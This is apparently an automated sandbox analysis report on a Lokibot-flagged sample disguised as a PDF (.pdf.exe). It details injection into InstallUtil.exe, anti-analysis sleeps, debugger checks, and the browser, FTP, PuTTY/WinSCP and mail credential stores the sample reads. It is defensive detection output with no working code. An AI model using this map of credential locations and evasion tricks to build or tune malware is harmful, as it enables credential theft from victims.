Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exeCode function: 0_2_003D8382 pushfd ; iretd
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exeCode function: 0_2_00D91E7F pushad ; iretd
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_00402AC0 push eax; ret
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_00402AC0 push eax; ret

Persistence and Installation Behavior:

barindex
Drops PE filesShow sources
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\1CF93A\AA2F06.exeJump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Uses an obfuscated file name to hide its real file extension (double extension)Show sources
Source: Possible double extension: pdf.exeStatic PE information: EDG95320200205005000471_126_953.pdf.exe
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX

Malware Analysis System Evasion:

barindex
Contains long sleeps (>= 3 min)Show sources
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exeThread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)Show sources
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exeWindow / User API: threadDelayed 711
May sleep (evasive loops) to hinder dynamic analysisShow sources
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exe TID: 4512Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exe TID: 1764Thread sleep count: 711 > 30
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exe TID: 5080Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5468Thread sleep time: -1560000s >= -30000s
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,
Queries a list of all running processesShow sources
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exeProcess information queried: ProcessInformation

Anti Debugging:

barindex
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)Show sources
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exeCode function: 0_2_00D9EC58 LdrInitializeThunk,
Contains functionality to read the PEBShow sources
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_0040317B mov eax, dword ptr fs:[00000030h]
Contains functionality which may be used to detect a debugger (GetProcessHeap)Show sources
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_00402B7C GetProcessHeap,RtlAllocateHeap,
Enables debug privilegesShow sources
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exeProcess token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess token adjusted: Debug
Creates guard pages, often used to prevent reverse engineering and debuggingShow sources
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exeMemory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

barindex
Creates a process in suspended mode (likely to inject code)Show sources
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
May try to detect the Windows Explorer process (often used for injection)Show sources
Source: InstallUtil.exe, 00000003.00000002.1184733969.0000000001360000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
Source: InstallUtil.exe, 00000003.00000002.1184733969.0000000001360000.00000002.00000001.sdmpBinary or memory string: Progman
Source: InstallUtil.exe, 00000003.00000002.1184733969.0000000001360000.00000002.00000001.sdmpBinary or memory string: hProgram ManagerWE
Source: InstallUtil.exe, 00000003.00000002.1184733969.0000000001360000.00000002.00000001.sdmpBinary or memory string: Progmanlock

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a deviceShow sources
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exeQueries volume information: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exe VolumeInformation
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Build.Utilities.v4.0\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Utilities.v4.0.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\ VolumeInformation
Contains functionality to query the account / user nameShow sources
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_00406069 GetUserNameW,
Queries the cryptographic machine GUIDShow sources
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

barindex
Yara detected LokibotShow sources
Source: Yara matchFile source: 00000000.00000003.951528258.00000000057E6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000002.1184014650.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000002.955874046.000000000370B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000002.955990238.000000000374B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000002.955936456.0000000003731000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000002.954718475.00000000026DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: EDG95320200205005000471_126_953.pdf.exe PID: 2428, type: MEMORY
Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 5516, type: MEMORY
Source: Yara matchFile source: 3.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 3.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl
Tries to harvest and steal browser information (history, passwords, etc)Show sources
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\6c4zjj0s.default\cert9.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\6c4zjj0s.default\pkcs11.txt
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\6c4zjj0s.default\key4.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Tries to harvest and steal ftp login credentialsShow sources
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
Tries to steal Mail credentials (via file access)Show sources
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Tries to steal Mail credentials (via file registry)Show sources
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: PopPassword
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: SmtpPassword

Malware Configuration

No configs have been found

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet